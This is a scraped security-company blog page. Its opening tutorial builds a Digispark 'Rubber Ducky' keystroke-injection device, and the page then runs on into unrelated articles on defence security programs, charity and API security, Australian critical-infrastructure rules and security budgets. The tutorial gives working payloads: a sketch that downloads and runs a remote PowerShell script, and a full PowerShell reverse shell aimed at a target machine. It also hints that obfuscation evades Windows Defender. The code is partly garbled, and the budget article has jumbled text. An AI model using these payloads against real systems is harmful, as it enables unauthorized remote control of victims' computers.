• Your shield in Cyber Security

Mallard: A DIY Arduino Rubber Ducky

What is an Arduino Rubber Ducky?

An Arduino Rubber Ducky refers to a device that emulates a USB keyboard and can be used for various tasks, including automating keyboard inputs and executing specific commands on a computer. The name “Rubber Ducky” is a nod to the original USB Rubber Ducky, a popular tool developed by Hak5 for penetration testing and security research.

The Digispark ATtiny85 is a microcontroller board based on the ATtiny85 chip. It’s known for its compact size and affordability. Some enthusiasts and security researchers have used the Digispark ATtiny85 as a platform to create their own DIY USB Rubber Ducky-like devices. These custom devices can be programmed to emulate a USB keyboard, allowing them to send predefined keyboard inputs to a target computer when plugged in.

Okay cool so you’ve received the package in the mail – now let’s create our own DIY USB Rubber Ducky


First things first, grab the Arduino Integrated Development Environment (IDE):

  1. Head over to the Arduino website at https://www.arduino.cc/en/software.

  2. On their site, find the ‘Download’ link for the Arduino IDE and give it a click.

  3. Once the download’s done, find the file in your Downloads folder or wherever you keep your downloads.

  4. Double-click the downloaded file to kick off the Arduino IDE installation.

  5. Just follow the installation wizard’s steps – it’s a like any other install.


After successfully installing the Arduino IDE, the next step is to configure it for writing payloads to the Digispark. Here’s how:

  1. Launch the Arduino IDE.

  2. Navigate to ‘File,’ then ‘Preferences’ in the IDE.

  3. In the ‘Preferences’ window, locate the ‘Additional Boards Manager URLs’ input box.

  4. Paste the following URL into that input box. This step is crucial as it enables the Arduino IDE to work with third-party boards, including the Digispark.”



Install Digispark AVR Boards

Next up, we have to get the Digistump Digispark boards installed so that your Arduino IDE can communicate with your board. Here’s how:

  1. Go to ‘Tools’ in the Arduino IDE.

  2. Select ‘Board,’ and then click on ‘Boards Manager.’

  3. In the ‘Boards Manager’ window, select ‘contributed’ from the drop-down menu.

  4. Now, search for ‘Digistump AVR Boards.’

  5. Once you spot it, you should see an ‘Install’ button. Hit that button and give it a moment to wrap up the installation of the boards.”

select Digistump AVR Boards


Digispark Drivers

That should cover everything you require. But in case Windows is giving you a bit of trouble recognizing your board, you might need to install the drivers manually.

  1. Go to the given URL, then head to release page.

  2. There should be a download link for a file called ‘Digistump.Drivers.zip.’

  3. Download that zip file and give it an unzip.

  4. Finally, go ahead and install the drivers.

That should sort out any driver-related issues you might encounter.”



Digispark Payloads

Now that your Arduino IDE is up and running with the drivers all set, it’s time to get your hands on some payloads. The internet is a treasure trove of payloads, each with its unique bag of tricks. You can find payloads that range from cheeky pranks like simulating a fake Windows update while flooding the target with Rick Astley’s ‘Never Gonna Give You Up’ to more potent ones like launching a Fork Bomb or reverse shell on the target system.

A quick word of caution: Some of these payloads can be a bit dangerous. So, exercise caution while experimenting with them.

For a starting point, check out this GitHub repository. It’s got a collection of well-crafted payloads.



Command Execution

For demonstration purposes let’s do a basic command execution PoC to enumerate the target machine. I wrote a very basic script:

#include "DigiKeyboard.h"

void setup() {

void loop() {
 DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
 DigiKeyboard.print("                      dir ");
 DigiKeyboard.print("whoami /all && hostname && systeminfo");
  for(;;) { /*empty*/ }

The script simulates keyboard input to execute various commands in a (CMD) window. Let me explain each part of the script step by step:

#include "DigiKeyboard.h"void setup() {
  • This part of the script includes the DigiKeyboard library, which is used for emulating USB keyboard input.

void loop() {
  • The loop() function is the main execution loop of the script. It will run continuously as long as the device is powered on.

  • This line sends a “null” keystroke, which doesn’t have any visible effect but is used as a delay or to release any previously held keys.

  • This line introduces a delay of 300 milliseconds (0.3 seconds). It waits for a brief moment before continuing with the script.( you can increase this but the script will execute at a slower rate)

 DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
  • This line simulates pressing the Windows key (the “MOD_GUI_LEFT” modifier) along with the “R” key. This shortcut opens the “Run” dialog in Windows.

  • Another delay of 300 milliseconds is added to allow time for the “Run” dialog to open.

  • This line sends the string “cmd” as keyboard input. It types “cmd” into the “Run” dialog, which is the command to open the Command Prompt.

  • This line simulates pressing the “Enter” key. It submits the “cmd” command, effectively opening the Command Prompt window.

  • Another delay of 500 milliseconds is added. This delay allows some time for the Command Prompt to fully load.

  DigiKeyboard.print("                      dir ");
  • This line sends a series of spaces followed by the “dir” command to the Command Prompt (for some reason when I did not include the spaces, the command would not execute [could be because I set a short delay]) . The spaces are used to clear any existing text in the Command Prompt window before typing the “dir” command. “dir” is then run to list files and directories in the current directory.

  • This line simulates pressing the “Enter” key, which submits the “dir” command for execution.

 DigiKeyboard.print("whoami /all && hostname && systeminfo");
  • This line sends a series of commands separated by “&&” to the Command Prompt. It executes the following commands:

  • whoami /all: Displays information about the currently logged-in user.

  • hostname: Displays the computer’s hostname.

  • systeminfo: Displays detailed system information, including the operating system version, hardware details, and more.

  • Finally, this line simulates pressing the “Enter” key to execute the entire series of commands in the Command Prompt.

In summary, this script emulates keyboard input to open the Command Prompt, clear its contents, and then execute a series of commands to gather information about the system, including user information, hostname, and system details. The results are displayed in the Command Prompt window or output to a file with some minor modification.


This attack can be further escalated to something more useful such as a reverse shell.

Reverse Shell Payload

Now I’ll show an easy reverse shell payload using a Powershell reverse shell. You can see from the script below that this is a pretty simple script.

It starts by sending the Windows Key and R to the computer. This opens the Run dialog box as explained earlier. After a brief delay, it types out “powershell.exe” into the Run dialog box and then sends the Enter key. This spawns a new Powershell window.

In the new Powershell Window, it types out a command to download another payload from a URL. After a brief delay, it then executes the payload.

// This script downloads and executes a powershell script efectively opening up a reverse shell in less than 3 seconds.
// Credits to hak5 and samratashok (developer of the nishang framework).

#include "DigiKeyboard.h"
void setup() {

void loop() {
 DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
 DigiKeyboard.print("Invoke-WebRequest -Uri '<https://github.com/Sic4rio/OSCP-2023/raw/main/shells/sh3ll.ps1>' -OutFile 'payload.ps1'");
  for (;;) {
    /*Stops the digispark from running the scipt again*/

Please note that the following Powershell script will probably be caught by Windows Defender. However, with some tinkering like renaming variables and obfuscating the code, it will not be detected. I won’t be showing that in this walk-through. The following script is a reverse shell that will attempt to connect back to the IP address and port that you specify.

$client = New-Object System.Net.Sockets.TCPClient('IP ADDRESS',PORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Writing Payloads To Digispark

Once you have your payloads ready, it’s time to write the payload to the Digispark. It’s important that you don’t plug in the Digispark first.

First, paste your code into the Arduino IDE and then click the upload button. This will then spawn a terminal at the bottom of the application prompting you to plugin the device. You should now be able to plug in your Digispark. Once the terminal reads 100%, the payload will automatically execute. Probably best if you don’t try to use any payload that can potentially damage your computer.

wait for this message “Plug in device now” before you plug the usb in.once you see it – connect up and it will first erase whats on there then write the script to it.


With the payload written to the Digispark, it’s time to test it out. Ensure that you have set up a net cat listener or some other listener on your attack machine (the machine you want to connect back to) and plug the Digispark into the target machine.



The Digispark is a great little affordable device that has a lot of flexibility. The price alone is enough to justify owning one and tinkering with it. You can use it for automation rather than hacking. You can tell it to do anything a keyboard can do provided the payload fits on the 6000kb chip.

Until next time…


Key Note

This blog post was originally written for a work project and is very much inspired by “Hack any computer in 2 seconds with this $2 device” by [Haxez]. You can read the full article here.


Special Thanks

A massive thank you to the following resources and websites that taught me all of this:

  • https://www.arduino.cc/

  • https://shop.hak5.org/

  • https://medium.com/techloop/usb-rubber-duckies-with-arduino-c9f08d88ef6d

  • https://www.hackster.io/ikigai/rubber-ducky-using-arduino-593fb1

  • https://haxez.org

  • https://onecloudemoji.github.io/

Stay Up to Date

Latest News

Why Universities Need to Prioritize Cyber Security: A Look at DISP

Paul A. Watters, Strategic Cyber Consultant, Ionize

In Australia, the Defence Industry Security Program (DISP) is an initiative administered by the Department of Defence that is responsible for protecting classified information and technology in the possession of Defence contractors and other private sector organisations that have been granted access to such information and technology (https://www.defence.gov.au/security/industry). The DISP serves to protect classified information and technology from unauthorised disclosure and to ensure that contractors and other private sector organisations handling such information and technology have appropriate security measures in place. The DISP also helps to ensure that contractors and other private sector organisations are able to maintain the trust of the government and the public by demonstrating their commitment to safeguarding classified information and technology.

DISP requirements include:

  • Establishing and maintaining a security management system that meets the requirements of the DISP

  • Ensuring that all personnel with access to classified information and technology have the necessary security clearances (https://www.defence.gov.au/security/clearances/about/overview) and have been trained in the proper handling of such information and technology

  • Protecting classified information and technology from unauthorised access, use, reproduction, and disclosure

  • Reporting any security breaches or other incidents involving classified information and technology to the appropriate authorities

  • Complying with all applicable laws, regulations, and policies related to the handling of classified information and technology

  • Working with the Department of Defence to continuously improve security practices and procedures.

DISP benefits include:

  • Maintaining the trust of the government and the public: By demonstrating their commitment to safeguarding classified information and technology, contractors and other private sector organisations participating in the DISP are able to maintain the trust of the government and the public. In simple terms – if you want a Defence contract, you will need to be a DISP member.

  • Promoting collaboration and innovation: By ensuring that contractors and other private sector organisations have the necessary security measures in place to handle classified information and technology, the DISP promotes collaboration and innovation within the Defence industry.

  • Enhancing the security of Defence systems and technologies: By protecting classified information and technology from unauthorised disclosure, the DISP helps to enhance the security of Defence systems and technologies.

  • Facilitating the exchange of classified information and technology: The DISP helps to facilitate the exchange of classified information and technology between the government and contractors and other private sector organisations, which can be important for the development and implementation of Defence systems and technologies.


Universities may benefit from DISP membership, yet, cybersecurity risks remain significant for the sector. Why is it important for universities to protect against cyber-attacks? Universities have large user bases which are particularly susceptible to:

  • Phishing attacks: Universities are often targeted by phishing attacks, in which attackers send fake emails or other communications that appear to be from a legitimate source, in an attempt to trick individuals into revealing sensitive information or installing malware.

  • Malware: Universities are vulnerable to malware attacks, in which attackers use malicious software to gain access to or disrupt computer systems.

  • Ransomware: Universities may also be targeted by ransomware attacks, in which attackers encrypt or otherwise lock access to data and demand payment in exchange for the keys to unlock it.

  • Data breaches: Universities may experience data breaches, in which attackers gain unauthorised access to sensitive data such as student or faculty records.

  • Insider threats: Universities may also face risks from insider threats, in which employees or other insiders use their access to sensitive information or systems for malicious purposes.

  • Weak passwords: Universities may be vulnerable to cyber attacks if employees use weak passwords or reuse passwords across multiple accounts.

More broadly, universities are very susceptible to foreign interference, and present a risk to DISP membership. Like other organisations, universities may be targeted by foreign governments or other entities seeking to influence research or steal intellectual property. Universities may also be targeted by foreign actors seeking to gain access to sensitive information or technologies. This is particularly true if the university receives defence funding, contracts or grants, or conducts research which could endanger national security if disclosed to adversarial foreign governments.

To protect against foreign interference, universities should implement strong cybersecurity measures such as email filtering, antivirus software, and employee training programs. Universities should also be aware of the potential for foreign interference and take steps to safeguard against it, such as carefully vetting external partnerships and funding sources. Additionally, universities can work with government agencies and other organisations to identify and respond to potential threats.

One strategy that universities can develop is a counterintelligence program. While this approach may be at odds with the historically open and liberal nature of higher education, nonetheless, some foreign governments are actively targeting universities.

A counterintelligence program is a set of measures designed to detect, prevent, and mitigate threats to an organisation’s information, personnel, and operations from foreign intelligence agencies, terrorists, and other adversaries. A counterintelligence program may include the following elements:

  • Threat assessment: A thorough understanding of the threats faced by an organisation, including the capabilities and motivations of potential adversaries.

  • Security measures: Physical, technical, and administrative measures to protect against threats to information, personnel, and operations.

  • Counterintelligence activities: Activities designed to detect and disrupt the efforts of foreign intelligence agencies and other adversaries to gain access to sensitive information or compromise personnel.

  • Employee training: Training programs to educate employees about the threats faced by the organisation and how to protect against them.

  • Intelligence collection and analysis: Gathering and analysing information about potential threats to the organisation.

  • Collaboration with other organisations: Working with other organisations, including law enforcement agencies and the intelligence community, to share information and coordinate efforts to protect against threats.

It is possible that universities may find it challenging to implement a counterintelligence program due to a variety of factors. For example:

  • Limited resources: Universities may have limited resources, including budget and personnel, to devote to counterintelligence efforts.

  • Complex organisational structure: Universities may have a complex organisational structure, with many departments, centres, and institutes, which can make it difficult to coordinate counterintelligence activities across the entire organisation.

  • Open and collaborative culture: Universities are generally characterised by an open and collaborative culture, which can make it difficult to implement security measures and restrict access to sensitive information.

  • Large number of external partnerships: Universities may have a large number of external partnerships and collaborations, which can make it difficult to manage and mitigate potential threats.

  • Despite these challenges, it is important for universities to take steps to protect against threats to their information, personnel, and operations. Universities can work with security experts and other organisations to develop a counterintelligence program that meets their unique needs and resources.

The Department of Education provides guidelines for universities to follow to counter foreign interference (https://www.education.gov.au/guidelines-counter-foreign-interference-australian-university-sector). While comprehensive, it is important to note that guidelines are not a counterintelligence program in their own right, and there are only four templates provided to even begin the process of developing a counterintelligence program.

Ionize assists a number of universities with DISP membership, cybersecurity program development and implementation, and implementing strategies to counter foreign interference. If you would like more information contact Ionize below.

Stay Up to Date

Latest News

Cyber Security for Charities and NFP

What do Australian Charities and the NFP sector need to know about Cyber Security?


Paul A. Watters, Senior Cyber Solutions Consultant, Ionize (99+) Paul Watters PhD | LinkedIn

Jacob Muller, Director, Technology Solutions & Social Impact, WorkVentures https://www.linkedin.com/in/jacob-b-muller/


The low down: Charities need to secure themselves against cyber attacks which are primarily financially focused attacks, secondarily attacks to steal the PII of their donors and/or clients, and thirdly, as backdoors to government networks and systems.

Click Me

Charities are high value targets for cybercriminals, since they take in very significant amounts of revenue through donations and For Purpose enterprises, often retaining large cash surpluses to fund capital intensive activities. Charities also hold very large donor and client databases, often containing very significant amounts of Personally Identifying Information (PII) about their clients and donors. To make it easy for people to donate, charities often have public facing internet sites, where the public can make donations. Most charities operating frontline services to the most vulnerable people in society – including the elderly, people with a disability, and children – hold significant amounts of PII in order to operate. Many charities also hold significant government contracts, and hold privileges access to government computer systems.

Case Study: Australian charities have been the target of significant cyber attacks in the recent past. In 2020, Anglicare Sydney suffered a ransomware attack, where 17G of PII data was encrypted by an overseas attacker1. The PII was associated with some of the vulnerable people in society, including those involved in foster care and adoption. It was also reported that Anglicare had direct access into the NSW Government FACS computer system, providing a pathway for cybercriminals to execute a “lateral movement” attack, identifying and breaching even more sensitive systems.

In cybersecurity, sometimes it is helpful to view the problem through a number of lenses. For charities, we believe that the best two lenses are “Compliance” and “Pragmatic”, ie, what are the cyber activities that should be taking place to meet the legal and regulatory requirements associated with operating a charity, and what are the practical steps that should be taken to protect charities against cyber threats. In this blog, we further describe how to use these lenses to maximise benefit from cybersecurity costs, acknowledging that every dollar spent on cyber is a dollar not spent on delivering frontline services. Yet if cybercriminals successfully hold a charity to ransom, or extort them, then there will be no money to provide these services.

The Compliance Lens

The sector is regulated by the ACNC. The ACNC do not mandate the use of any particular standard or methodology for charities to secure themselves. This is potentially a weakness – other sectors, such as the federal government, have mandated security controls and maturity levels to which Commonwealth entities must achieve. According to the Australian Signals Directorate (ASD), achieving compliance with these standards eliminates 85% of cyber attacks.

Nonetheless, the ACNC does provide a Cybersecurity Checklist2 which is extremely helpful as a guide to what the regulator expects. At any time, charities must be able to demonstrate to the regulator how they meet these requirements.


The key requirements are as follows:

  • How will you prevent cyber attacks that steal donor funds by having clear policies, procedures and guidelines?

  • How will you protect the PII of your donors through clear policies, procedures and guidelines?

  • Have you trained all staff and volunteers on dealing with cyber issues, such as anti-phishing training?

  • Have you conducted cyber assessments on your systems, such as penetration tests?

  • Do you have a plan on how to deal with data breaches, and have you ever tested the plan to see if it works?

  • Do you protect all endpoints – such as PCs and mobile devices – with security software?

  • Do you update and patch all of your software?

  • Have you enabled two factor authentication?

  • Do you backup all critical data?

  • Do you seek help from cyber specialists?

8 Step Guide


The Pragmatic Lens Turning these requirements into a clear plan is a practical task. We provide an 8-point, step-by-step guide below:

  1. Appoint a Chief Information Security Officer (CISO), either an internal staff member, or a part-time consultant, to oversee the cyber program, and report to the Board.

  2. Conduct a cybersecurity assessment to identify your biggest and most significant risks, and address these first. Generic advice will only get you so far in cyber, context is everything.

  3. Establish a policy and procedure base, aligned to one or more international cyber standards, such as NIST or ISO27001. This base should document everything that anyone involved in handling PII, or donor data, or funds, needs to know to prevent, detect and/or respond to cyber attacks.

  4. Establish an annual training program for all staff and volunteers.

  5. Conduct vulnerability assessments on every external facing system, especially those which process donor transactions, or hold donor PII.

  6. Establish a data breach recovery plan, including offsite backups of all critical data, and test that it works annually.

  7. Install a security software baseline on all endpoints, including anti-virus protection, and – for officeholders and executives – 24×7 “eyes on glass” monitoring through a Security Operations Centre (SOC).

  8. Patch all systems and set updates to be automatic. Sometimes, this will mean testing that your critical systems work in a staging environment before applying the patch to full production.

WorkVentures and Ionize are working together to support charities and the For Purpose sector, and can provide support around each of these eight items. In summary – don’t be the charity that loses donor funds to cybercriminals, or lose the PII of your donors or clients, or be the source of a significant downstream attack on government computers or systems.

Stay Up to Date

Latest News

Strengthening API Security in 3 Steps

Dr Paul A. Watters , Strategic Cyber Consultant, Ionize

Dr Omaru Maruatona , CEO, Aiculus Ltd

The recent headline was clear – “JP Morgan Chase … is now routing all inquiries through its secure application programming interface instead of allowing these services to collect data through screen scraping1.”

To the non-specialist, this kind of headline may seem completely innocuous; to the specialists in Enterprise Application Integration (EAI), the end of era, as old-style, mainframe-embedded services often operating through dedicated data lines at great cost, could finally make the transition to an open and automated internet.

What could possibly go wrong?

The approach really signals a seismic shift in banking – and supported to a large extent by regulatory zeitgeists like “Consumer Data Right”2, “Open Banking”3 and the like. These initiatives are designed to introduce competition between financial services providers at a very granular level; from the consumer perspective, no longer should one monolithic bank be providing all of the backend services involved in money management. Through a whizz-bang set of magical tricks, providers can be selected optimally (sometimes behind the scenes) with a single, coherent view of one’s financial status presented through an app.

Again – we ask the question – what could possibly go wrong?

In security, generally speaking, the easier and less restrictive that something becomes, the greater the potential for abuse. This is certainly the case for the widespread use of APIs – we are not dinosaurs advocating for a return to isolated, expensive mainframe systems. Yet, it is also true that unregulated, uncontrolled APIs being exposed on the internet have also been the scourge of a number of recent data breaches4.

Screen scraping provided an unintentional layer of protection – almost, you could say, security through obscurity, or just the practical difficulties of exploiting what was a semi-automated and cumbersome process. We can’t go back to the old days. In order to support CDR, open banking and other initiatives, what is the best way forward?

Let’s look at the basics. An exposed API is typically going to be made through port 80 (not secure!) or port 443 (secure!); these ports are almost always opened through the firewall, otherwise standard web traffic will not be allowed in or out of the network. So a standard perimeter defence is not going to protect an open API, particularly if the authentication credentials are correct or if it requires no authentication at all, which some APIs do.

In all likelihood, open API deployments will need to consider a risk-based approach. This means monitoring inbound requests and outbound traffic, to determine whether it constitutes a data breach (or not). Another difficulty is that data breaches are rare, so there is great potential for time-consuming false positives to be generated with low frequency (true positive) events. We believe that one way to approach the problem is to adapt the kinds of techniques and strategies used by banks to detect fraud – this approach, using Artificial Intelligence, uses both rules and data mining to score whether transactions are likely to be fraudulent (or not). By scoring each request and response to an API request, high risk transactions can be paused, investigated and/or rejected. This is the approach that Aiculus has taken with the development of our API security product, building on Dr Maruatona’s experience in designing banking fraud detection systems using ripple-down rules and Prudent AI5.

A complementary approach is API red-teaming; at Ionize, our approach builds on our standard methodology for web application penetration testing. After scanning for known vulnerabilities from the infrastructure and web stack, we then try to build and test queries and requests that could be used to bypass any technical controls that have been put in place. Many open APIs use the Simple Object Access Protocol (SOAP) – essentially providing remote method invocation using a HTTP/HTTPS request – and unsurprisingly, there are numerous documented approaches to SOAP hacking6, which could be exploited for a data breach.

Finally, and perhaps an over-riding consideration, is having proper architectural reviews done on system, network and data design, well in advance of any implementation of any kind. A typical Ionize architectural review will ask broad and probing questions of the design team, such as:

  • Are there any situations where a query needs to return ALL data elements from one or more tables? If not, then data should be segmented to prevent whole customer databases from being downloaded.

  • Do all network services within a subnet need to be exposed? If not, then the most restrictive access permissions at all network layers should be implemented.

  • Are user roles and access permissions well-defined and consistently implemented? How are networks agents authenticated – are static strings as security tokens visible in system memory, on process lists, or sniffable on the network?

This list is not meant to be exhaustive, but illustrative, of a typical 10-day API penetration testing engagement.

In summary, to protect APIs, we recommend:

  • Security architectural advice from a blue team prior to development and implementation
  • Penetration testing prior to system deployment, and at regular intervals as patches and tech stack upgrades may introduce new vulnerabilities
  • Real-time monitoring and risk scoring of all API requests and responses, using AI, to block suspicious requests that might be indicative of a data breach.

[1] https://www.americanbanker.com/news/jpmorgan-chase-says-it-has-fully-eliminated-screen-scraping


[2] https://www.insurancenews.com.au/local/optus-breach-increases-caution-over-consumer-data-right

[3] https://www.finextra.com/newsarticle/41271/saudi-arabia-unveils-open-banking-framework

[4] https://www.complianceweek.com/cybersecurity/cyber-risk-management-lessons-from-optus-data-breach/32223.article

[5]Maruatona, O., Vamplew, P., Dazeley, R., & Watters, P. A. (2017, November). Evaluating accuracy in prudence analysis for cyber security. In International Conference on Neural Information Processing (pp. 407-417). Springer, Cham.

[6] https://brightsec.com/blog/top-7-soap-api-vulnerabilities/

Stay Up to Date

Latest News

Cyber and Critical Infrastructure Regulations in Australia – A User’s Guide

Paul A. Watters

 SOCI. SLACIP. Critical Tech. NIST. NICE. COBIT. CIS V8. E8. C2M2. ISO 27001. An ever-expanding array of acronyms and government requirements can be very confusing for non-experts in relation to cybersecurity. However, it is critical that businesses get up to speed quickly, as there is generally a short timeframe between consultation and implementation of new regulation. The consequences for non-compliance are serious and two-fold: firstly, directors and office-bearers face significant and expanding penalties, if a breach or incident occurs; and secondly, the consequences of any breach can be very significant, as recent experiences have shown, where millions of records have been breached.

To summarise this article, to keep up with the ever-expanding remit of the federal government over anything remotely relevant to cybersecurity, many organisations will need to have a formal, documented, registered and audited cyber security program. While this is good advice for all large organisations – “large” meaning annual turnover of $3m, thus being subject to the Commonwealth Privacy Act[1] – organisations in any of the 11 “critical infrastructure” industry sectors, owning or operating one of 10 “asset classes”, or developing any technology in one of the 63 “critical technology” classes, have very specific and expanding requirements. The take home message of this article is – if you haven’t already – seek specialist advice that relates to your industry sector, and make sure you comply. As with everything cyber, this is a moving feast, and failing to keep up with regulatory changes, and then suffering a breach, could bring about very unwelcome public attention, government scrutiny and penalties.


What are the new requirements?


Essentially, there are two critical pieces of legislation that need to be considered for Australian entities considered to be operating critical infrastructure – the Security of Critical Infrastructure Act 2018 (SOCI)[2] and the Security Legislation Amendment (Critical Infrastructure Protection) Act 2022 (SLACIP)[3].


Under SOCI, the two key requirements are to register critical assets and systems and report incidents.


The legislation is based on the government extending its oversight of systems and assets considered to be critical at a national level, through owner/operator registration. So, categories such as freight, hospitals and food/grocery are clearly “critical”. These assets also bring a significant exposure to cyber risks – there have been numerous cases of hospitals being unable to function due to ransomware attacks, as just one example. However, in relation to cyber, there are specific ICT assets named in the legislation – such as broadcasting, the domain name system, data storage and data processing. Operators of these systems must have notified the government of owner and operator information on 8th April 2022, with a 6 month grace period, which has now expired. Additional requirements apply to the telecommunications sector. Note that the industry categories for the reporting obligation is much broader than the categories required to register. These are listed at the end of this blog.


In short – if you are not compliant with registration, you should seek urgent professional assistance to become compliant.


In addition to registration, entities also have mandatory reporting requirements that also came into effect on 8th April 2022, but where there was a 3 month grace period. This reporting[4] is designed to enable an effective national (government-supported) response to critical incidents affecting critical assets and systems. It is perhaps unsurprising, then, to see an increase in publicly reported incidents since the middle of 2022. Again – if you operate critical infrastructure, and you don’t have the capacity to interact with or report to the Australian Cyber Security Centre (ACSC) or other government entities with responsibility for cyber and critical infrastructure, it is critical that you initiate this process immediately. In our experience, common issues that arise in this process are (a) lack of staff with appropriate security clearances and/or probity checks, (b) lack of staff with incident response capabilities; and (c) the absence of 24×7, eyes-on-glass monitoring of critical infrastructure, which can only be achieved through a Security Operations Centre (SOC).


In short – if you are not reporting, or not setup to report – you need to create a SOC now, or engage an MSSP to do this on your behalf.


Under SLACIP, owner/operator obligations have been extended even further. Owners and operators of critical infrastructure must initiate and implement a risk management program, and must implement additional cyber security protections for Systems of National Significance (SoNS). The criteria for which systems will be designated as SoNS remain unclear; however, we suggest that any system covered by the SOCI criteria could potentially be classified as a SoNS. Under SLACIP, the risk management program must maintained and kept up-to-date, and annual reports provided to government. This program must consider methods to identify, manage and reduce risk for natural hazards, personnel hazards, cyber hazards, the supply chain, and physical security requirements. Regularly running cyber exercises and undertaking vulnerability assessments are two of the suggested ways to continuously reduce risk.


It is also a requirement under the draft Risk Management Rules[5] to adopt (within 6 months of the Act coming into effect) a written cyber security risk management plan, and (within 18 months) to have adopted and achieved compliance with one of the following cyber risk frameworks or standards:


· Australian Cyber Security Centre’s Essential Eight Maturity Model at maturity level one;


· AS ISO/IEC 27001:2015;


· The National Institute of Standards and Technology (NIST) Cybersecurity Framework;


· The Cybersecurity Capability Maturity Model (C2M2) at Maturity Indicator Level 1;


· Security Profile 1 of the Australian Energy Sector Cyber Security Framework; or


· an equivalent standard


Our recommendations


If you own or operate a system or asset covered by SOCI and SLACIP for registration or reporting, just from a cyber perspective, we recommend:


· Registering the system or asset with the government as required


· Adopting ONE cybersecurity framework or control set, and achieving auditable compliance with this


· Setting up a SOC, or working with an MSSP to obtain SOC coverage, for the critical asset or system


· Setup a risk reporting system that provides annual reports to government as required, as well as incident reporting as and when needed


· Ensure that all non-cyber aspects of SOCI and SLACIP are complied with; personnel risk, supply chain risk and other hazards may impact the capability of cyber teams to reduce the impact of any attack.


Registration and Reporting Requirements

Asset Class / Industry Category


Must Register


Must Report








Domain Name Systems






Data Storage or Processing






Payment Systems






Food and Grocery












Freight Infrastructure






Public Transport




Liquid Fuel




Energy Market Operator



































Financial Market Infrastructure












Aviation – Airports, Air Services, Cargo Agents


















Further Reading


Lander & Rogers – SOCI Act Explained[6]


Gilbert + Tobin – Final reforms to Australia’s critical infrastructure laws[7]


[1] https://www.oaic.gov.au/privacy/the-privacy-act

[2] https://www.homeaffairs.gov.au/about-us/our-portfolios/national-security/security-coordination/security-of-critical-infrastructure-act-2018

[3] https://www.homeaffairs.gov.au/reports-and-publications/submissions-and-discussion-papers/slacip-bill-2022 [4] https://www.cisc.gov.au/critical-infrastructure-centre-subsite/Files/cyber-security-incident-reporting.pdf

[5] https://www.homeaffairs.gov.au/reports-and-pubs/files/risk-management-program-rules.pdf [6] https://www.landers.com.au/soci-act-explained [7] https://www.gtlaw.com.au/knowledge/curtain-falls-final-reforms-australias-critical-infrastructure-laws

Stay Up to Date

Latest News

How much should you spend on Cybersecurity?

Paul A. Watters – Ionize
and Simon Brown

It’s a question that is asked time and time again, and it may well be the most important commercial question in relation to cybersecurity investment: how much should I be spending on cybersecurity? As with the answer to most questions, this needs to be broken down into a number of sub-questions, some of which are easier to answer than others. Rather than offering a simple answer to a complex problem, we analyse the question as follows:

  • Should you follow a fixed percentage guideline of revenue? Or profit? It depends on whether you are trying to protect profits or revenue. As always, we would advocate a risk-based approach – if cyber threats affect your revenue, eg, by denying service to your customers, then calculate a budget as a percentage of revenue. On the other hands, if you have stable revenue but variable costs that reduce profits, eg, by having to pay ransoms, then calculate as a percentage of profit.
  • Is your financial management approach traditional or modern? Is this dictated by business practices, eg, an agile, high growth business, or by a regulator, eg, banks and financial services companies?
  • Are some risks worth spending a fixed cost against to prevent cyber incidents, eg, endpoint protections, or should investment be weighted towards response which may have variable costs, eg, third party incident response?
  • Is it worth investing anything at all if the potential consequences are low or negligible? Or to put another way, do you know what your “crown jewels” are, versus systems, networks and data that are peripheral and not worth protecting?
  • Is it worth investing anything at all if the potential consequences are low or negligible? Or to put another way, do you know what your “crown jewels” are, versus systems, networks and data that are peripheral and not worth protecting? o $10m for critical infrastructure o $14m for financial services o $8m for government entities o $16m for industrials The difference between the smallest entities and the largest was considerable, ranging between $2m and $65m. As a percentage of overall IT budgets, the average was 7.5%. Internationally, Prosegur[2] report an average 10%, suggesting that Australian entities are still underinvesting in cybersecurity.
  • What percentage of revenue should be spent on ICT, will then determine the percentage spent on cybersecurity. Computer Economics published data in 2019 across 25 industry sectors, but the summary (as a percentage of revenue) was as follows, using the 25th, 50th and 75th percentiles: o Manufacturing: 1.4, 2.3, 3.2% o Financial Services: 4.4, 7.9, 11.4% o High Tech: 2.6, 3.65, 4.7% o Retail: 1.2, 2.1, 3.0% o Health Care: 3.0, 4.45, 5.9% The average across all sectors at the 50th percentile was 2.5% of revenue. So in the Australian context, cybersecurity budgets should be roughly 2.5% of 7.5% of revenue. For a $100m company, this suggests a budget of only $187,500. Given that the average salary for even a single cyber analyst in Melbourne is $128,778 (with 35% on-costs, this rises to $173,850), it seems obvious that adopting an average of averages approach would not even begin to address the resourcing needed for an internal cyber team. If you really want to break down cybersecurity costs further, Cynet have developed a very detailed budget template which is freely available[3]. Does this mean that Australian entities are likely underinvesting in cybersecurity on average? We believe that this simple exercise indicates that this may be the case. However, it’s also important to note that not all companies – even with $100m revenue – may need full-time cybersecurity staff. Using a Managed Security Service Provider (MSSP), for example, may be one way to access a broad range of services on an “as needed” basis, which could prove cost effective. RSI[4] suggest that an MSSP budgets per user range from US$99-250 per month, or A$141-357. As an average, this conveniently works out at $A249 per month, or $2,988 per annum. Taking our budget of $187,500, the implies that something on the order of 62.75 could be supported by an MSSP. Multiplying out the ABS data on SMEs (50 employees or $25m revenue), a $100m company may employ something on the order of 200 people[5]. So while the average case of 62.75 employees on the highest package seems expensive, in fact, the cheapest case is quite close: $141 per month would cover 98.99 employees. Can we then conclude that Australian business should be doubling their cybersecurity spend, even using the cheapest case? It’s hard to draw such a broad conclusion from some simple numerical modelling. Yet it is also true that some Australian entities are repeatedly attacked, while others seem to be better able to defend and prevent. This is almost certainly a function of overall investment, but also investment in the right categories. Further research is required to fully prove the case for cybersecurity investment to protect both revenue and profits. It’s important to note that Boards an executives must manage a number of competing demands when devising budgets, and not just cyber budgets – every dollar spent on cybersecurity controls may be perceived as reducing profits and shareholder returns. In the current market, Boards may be willing to tolerate higher levels of cyber risk, to maximise profits. At the end of the day, a good CISO will be able to amplify and clarify which elements of cybersecurity spend will have the greatest impact within a given context.


